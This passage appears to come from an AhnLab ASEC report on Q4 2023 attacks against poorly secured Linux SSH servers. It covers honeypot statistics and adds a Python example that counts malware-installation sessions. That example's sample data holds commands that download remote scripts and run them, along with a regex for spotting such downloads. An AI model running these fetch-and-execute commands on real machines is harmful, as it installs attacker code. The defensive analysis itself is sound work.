Statistics Report on Malware Targeting Linux SSH Servers in Q4 2023
Overview
AhnLab SEcurity intelligence Center (ASEC) uses honeypots to respond to and classify brute-force and dictionary attacks targeting poorly managed Linux SSH servers. This report covers the attack sources identified from honeypot logs in the fourth quarter of 2023, along with statistics on the attacks performed by those sources. It also categorizes the malware used in each attack and summarizes the corresponding statistics.
Statistics
1. Status of Attacks Against Linux SSH Servers
The following statistics are based on the AhnLab honeypot logs for attacks targeting Linux SSH servers during the fourth quarter of 2023. One notable characteristic of the fourth quarter of 2023 is that while the quantity of attack sources remained relatively stable, the number of attacks decreased. This decrease can be attributed to the reduced number of ShellBot attacks performed by multiple attack sources. Additionally, starting from November, there was an increase in the number of attack sources, which is a result of the recent surge in attacks by the P2PInfect worm malware.

Figure 1. Attacks against Linux SSH servers in Q4 2023
The “Attack source” category refers to the number of systems used by malware or threat actors to carry out attacks; that is, systems on which the logs confirm that actual malware installation commands were executed. ASEC honeypots collect logs of attacks targeting poorly managed Linux SSH servers. In this context, a poorly managed environment is one that is vulnerable to brute-force or dictionary attacks because of inadequately managed account credentials. If a login succeeds on such a system, the malware or threat actor gains control of it.
The “Attack status” shows the number of times threat actors or malware attacked the system. Attacks on poorly managed Linux SSH servers typically begin with scanning, and most attack attempts end once account credentials are obtained through brute-force or dictionary attacks, or after the subsequent phase of collecting basic system information. The statistics here count only cases where the logs show actual malware being installed beyond those stages.
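The two metrics defined above, distinct attack sources and attack count, both restricted to sessions where the logs show malware being installed, can be computed from honeypot session records as in the following added example. It is not ASEC's code; the sessions are constructed, and the recon-command list and installation heuristic are assumptions.

```python
import re
from collections import defaultdict

# Commands that only collect basic system information (assumed list, not ASEC's).
RECON_ONLY = {"uname", "cat", "ls", "whoami", "id", "nproc", "free", "w", "uptime", "lscpu"}
# Heuristic for a payload being fetched and run: a download piped to a shell,
# a chmod +x, or execution of a file in the working directory (assumed, not ASEC's).
INSTALL_RE = re.compile(
    r"\b(wget|curl|tftp)\b.*\|\s*(sh|bash)\b|\bchmod\s+\+?x\b|(^|[;&|])\s*\./\S+"
)

# Constructed sample sessions: (month, attacking IP, commands run after login).
SESSIONS = [
    ("2023-10", "198.51.100.7", ["uname -a", "cat /proc/cpuinfo"]),
    ("2023-10", "198.51.100.7", ["cd /tmp; wget http://198.51.100.7/x.sh; chmod +x x.sh; ./x.sh"]),
    ("2023-10", "203.0.113.5", []),
    ("2023-11", "203.0.113.5", ["curl -s http://203.0.113.5/a | sh"]),
    ("2023-11", "203.0.113.5", ["curl -s http://203.0.113.5/a | sh"]),
    ("2023-11", "192.0.2.9", ["whoami", "nproc"]),
]


def session_phase(commands):
    """Classify how far one session got: 'login_only', 'recon', 'install' or 'other'."""
    if not commands:
        return "login_only"
    if any(INSTALL_RE.search(c) for c in commands):
        return "install"
    first_words = {c.strip().split()[0] for c in commands if c.strip()}
    return "recon" if first_words <= RECON_ONLY else "other"


def quarterly_stats(sessions):
    """Per-month attack count and distinct attack sources, counting only sessions
    whose logs show a malware installation attempt (the report's definition)."""
    attacks = defaultdict(int)
    sources = defaultdict(set)
    for month, src_ip, commands in sessions:
        if session_phase(commands) != "install":
            continue  # scanning, credential guessing or recon alone is not counted
        attacks[month] += 1
        sources[month].add(src_ip)
    return {m: {"attacks": attacks[m], "sources": len(sources[m])} for m in sorted(attacks)}


if __name__ == "__main__":
    for month, row in quarterly_stats(SESSIONS).items():
        print(month, row)
```

Sessions that stop at login or basic information gathering are dropped, so a source that only probed in October but installed a payload in November is counted once, in November.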